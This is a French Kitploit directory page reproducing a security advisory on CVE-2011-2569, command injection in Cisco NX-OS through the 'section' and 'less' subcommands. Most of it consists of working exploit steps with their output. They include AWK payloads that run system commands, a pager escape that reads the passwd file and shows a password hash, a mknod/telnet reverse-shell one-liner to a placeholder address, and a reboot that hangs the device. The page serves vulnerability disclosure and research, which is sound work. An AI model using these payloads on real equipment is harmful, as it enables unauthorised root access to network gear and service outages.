Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
secpub — Vulnérabilités de sécurité publiées, recherches et informations associées. | Kitploit
Outils/GitHubGitHub/darkarnium/secpub
Sécurité des Systèmes EmbarquésEscalade de PrivilègesAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionArticles et RechercheApprentissage et ÉducationRessources Organisées
GitHubdarkarnium/secpub

secpub

Vulnérabilités de sécurité publiées, recherches et informations associées.

138294il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Cisco Nexus OS (NX-OS) - Problèmes d'« injection » / d'assainissement de commandes.

Découvert par :
  • Peter Adkins [email protected]
Accès :
  • Local ; un accès authentifié est requis.
Suivi et identifiants :
  • CVE - CVE-2011-2569
Systèmes d'exploitation concernés :
  • Cisco Nexus OS (NX-OS)
Implication du vendeur :
  • Alerté - correctifs disponibles / mis en œuvre pour certaines plateformes.
Systèmes / plateformes concernés :
  • Nexus 7000
  • Nexus 5000
  • Nexus 4000
  • Nexus 3000
  • Nexus 2000
  • Nexus 1000V
  • MDS
  • UCS
Remarques :

Un accès local est requis. Cependant, les comptes non privilégiés peuvent obtenir un accès au système d'exploitation Linux sous-jacent, ce qui fournit en pratique un accès complet à l'équipement. Cela pourrait potentiellement poser problème dans les environnements où le NOC et d'autres membres du personnel disposent d'un accès de bas niveau pour le premier point de contact, etc.

NX-OS - Sous-commande « section » - Problèmes d'injection / d'assainissement de commandes.

Ce problème a été découvert sur la plateforme Nexus 7000. On pense qu'il affecte également les plateformes suivantes :

  • Nexus 7000 ( OS < 5.2(1.61)S0 5.2(1)S73 5.2(1)S72 )
  • Nexus 5000 ( OS < UNK )
  • Nexus 4000 ( OS < UNK )
  • Nexus 3000 ( OS < UNK )
  • Nexus 2000 ( OS < UNK )
  • MDS ( OS < 5.2(1.61)S0 5.2(1)S73 5.2(1)S72 )

La commande section semble être un script AWK auquel la chaîne demandée est transmise. Cependant, l'entrée ne semble pas être correctement assainie. Par conséquent, AWK peut être utilisé pour exécuter des commandes arbitraires sur le sous-système Linux.

root@kitploit:~
nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"id"\) \}/' > 20110713.awk
Warning: There is already a file existing with this name. Do you want to
overwrite (yes/no)? [no] y

nx1# sh clock | sec '* -f /bootflash/20110713.awk '
uid=2003(user) gid=504(network-operator)
11:16:04.082 UTC Wed Jul 13 2011

nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"ls \/mnt\/cfg\/0\/"\) \}/' > 20110713.awk

nx1# sh clock | sec '* -f /bootflash/20110713.awk '
ascii
bin
boot
cfglabel.sysmgr
debug
licenses
linux
log
lost+found
11:18:41.885 UTC Wed Jul 13 2011

Cela peut même être utilisé pour supprimer tous les fichiers du bootflash et envoyer une commande « reboot » au système. Cependant, un redémarrage depuis le sous-système Linux provoque l'affichage de messages en rafale sur la console et le blocage de l'équipement, plutôt qu'un véritable rechargement de l'équipement.

NX-OS - Sous-commande « less » - Problèmes d'injection / d'assainissement de commandes.

On pense que les versions de logiciel suivantes sont concernées :

  • Nexus 7000 ( OS < 5.1(1) )
  • Nexus 5000 ( OS < 4.2(1)N2(1) )
  • Nexus 4000 ( OS < UNK)
  • Nexus 2000 ( OS < 4.2(1)N2(1) )
  • UCS ( OS < 1.4(1i) 1.3(1c) )
    • Sur la plateforme UCS, les commandes injectées sont exécutées en tant que root.
  • Nexus 1000V ( OS < UNK )
  • MDS ( OS < 5.1(1) )

À titre d'exemple :

root@kitploit:~
switch# sh clock | less

Une fois less affiché, nous ouvrons des fichiers en appuyant sur la touche deux-points puis « e » et en spécifiant le chemin du fichier.

root@kitploit:~
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

Cependant, il ne s'agit là encore que d'un accès en lecture seule. MAIS, si nous utilisons la macro de touche « | » (pipe) puis « $ », nous pouvons exécuter des commandes.

root@kitploit:~
!ls -lah > /bootflash/20110715

Comme illustré ci-dessous, le fichier a été créé sur la boot-flash.

root@kitploit:~
switch# dir
      97     Jul 15 12:01:44 2011  20110715

Grâce à cette méthode, j'ai pu établir un shell distant dans le sous-système Linux de NX-OS en utilisant ce qui suit :

root@kitploit:~
 mknod rs p; telnet ad.dr.es.s 8888 0<rs | /bin/bash 1>rs

Même la commande reboot est acceptée comme entrée valide. Cependant, plutôt que de redémarrer l'équipement, elle provoque le blocage du système tout en affichant des erreurs en rafale sur la console.

root@kitploit:~
 switch# sh clock | less
 Fri Jul 15 12:06:30 UTC 2011
 !reboot

 Broadcast message from root (Fri Jul 15 12:06:39 2011):
Télécharger l’outil